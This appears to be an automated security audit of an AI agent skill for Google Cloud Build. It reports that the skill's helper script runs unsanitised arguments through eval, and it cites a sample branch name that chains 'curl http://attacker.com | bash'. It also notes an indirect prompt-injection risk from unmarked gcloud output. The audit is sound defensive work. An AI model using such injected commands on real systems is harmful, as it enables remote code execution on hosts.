gcp-cloudbuild

Fail

Audited by Gen Agent Trust Hub on Jun 24, 2026

Risk Level: HIGHCOMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The helper script gcp-build-tool is vulnerable to command injection in the cmd_start function. The script constructs a shell command string by concatenating variables like $branch, $tag, and $substitutions which are taken directly from command-line arguments without sanitization or escaping. This string is then executed using the eval command. If an attacker can influence the parameters passed to the skill (e.g., via a prompt that results in a branch name like main; curl http://attacker.com | bash), they can achieve arbitrary code execution on the host.
  • [COMMAND_EXECUTION]: The skill ingest data from external Google Cloud Platform APIs using gcloud and processes it via jq. While GCP is a trusted service, the lack of output sanitization or boundary markers when handling trigger names, descriptions, or build statuses creates an attack surface for indirect prompt injection.
  • Ingestion points: Output from gcloud builds triggers list and gcloud builds list in gcp-build-tool.
  • Boundary markers: Absent in the instructions and the tool's output formatting.
  • Capability inventory: Arbitrary shell command execution via the eval vulnerability and general CLI access to gcloud and jq.
  • Sanitization: Absent; the script uses jq to extract values but subsequently executes them insecurely via eval.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Jun 24, 2026, 03:12 PM
Security Audit — agent-trust-hub — gcp-cloudbuild